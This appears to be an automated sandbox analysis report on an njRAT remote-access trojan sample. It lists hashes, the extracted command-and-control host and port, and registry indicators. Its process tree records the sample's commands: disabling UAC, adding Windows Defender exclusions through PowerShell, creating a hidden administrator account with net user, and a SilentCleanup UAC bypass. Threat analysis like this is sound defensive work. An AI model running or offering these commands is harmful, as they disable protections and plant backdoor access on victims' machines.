Analysis
-
max time kernel
140s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system -
submitted
01/09/2022, 06:51
Static task
static1
Behavioral task
behavioral1
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win10v2004-20220812-en
General
-
Target
6a6b2af0716cb8308dddae55dd325253.exe
-
Size
1.4MB
-
MD5
6a6b2af0716cb8308dddae55dd325253
-
SHA1
691556a82280d270bd0f763f1213b43c6c4c0b6d
-
SHA256
2cb6acd25b8d00468dd89658dc948836f92000e031085b6b3c798eb1504157df
-
SHA512
e517c7070e4c20eb16acc1dfa98c016a01a9fc66b1944c30e5270d3e616770804553140ff5b3b35c49c659b39e59cf999dc8fa5c00e9520bd57e6c9872d83f11
-
SSDEEP
24576:BxDQqQS0hvzxBbNLWYhMehi1VH/mUwz9md3Nz1OPSvu+1SHgYxw4d+q:BxQSEbBhMe+VOVBmfxfu+1SH1w40
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
4Mekey.myftp.biz:2411
18951a269d7
-
reg_key
18951a269d7
-
splitter
@!#&^%$
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions 6a6b2af0716cb8308dddae55dd325253.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools 6a6b2af0716cb8308dddae55dd325253.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6a6b2af0716cb8308dddae55dd325253.exe\"" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 6a6b2af0716cb8308dddae55dd325253.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1832 set thread context of 832 1832 6a6b2af0716cb8308dddae55dd325253.exe 57 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe 6a6b2af0716cb8308dddae55dd325253.exe File opened for modification C:\Windows\Microsoft.NET\Framework\b9xe33Q 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\w6qHIwG.raw 6a6b2af0716cb8308dddae55dd325253.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 2020 powershell.exe 1904 powershell.exe 1492 powershell.exe 1616 powershell.exe 1296 powershell.exe 1408 powershell.exe 2012 powershell.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe 1832 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1832 6a6b2af0716cb8308dddae55dd325253.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe Token: 33 832 RegSvcs.exe Token: SeIncBasePriorityPrivilege 832 RegSvcs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" 1⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add 2⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add 3⤵ PID:636
-
-
-
C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add 2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add 3⤵ PID:1412
-
-
-
C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "Admin" /add 2⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "Admin" /add 3⤵ PID:2012
-
-
-
C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "Admin" /del 2⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "Admin" /del 3⤵ PID:1324
-
-
-
C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I 2⤵ PID:1056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe" 2⤵ PID:1772
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" 2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize 7KB
MD5 64f2556b18e31b1a25f194931eebf4c0
SHA1 fd8eed8149a90c7535a5f5f723ce18c8c9808d1f
SHA256 59a44bc4130a029d0bf24605b9db94aee57b0b6805514e5f32b3a9ba18fda82f
SHA512 5c253bf3aee393365d2108dc5a43f73b81771d45f4ee15ef33dedca90d1ada5b5a9789a14ed32e435d1bd02a6b1463c3ab019ebcfac028d100fbf6902f48c1d3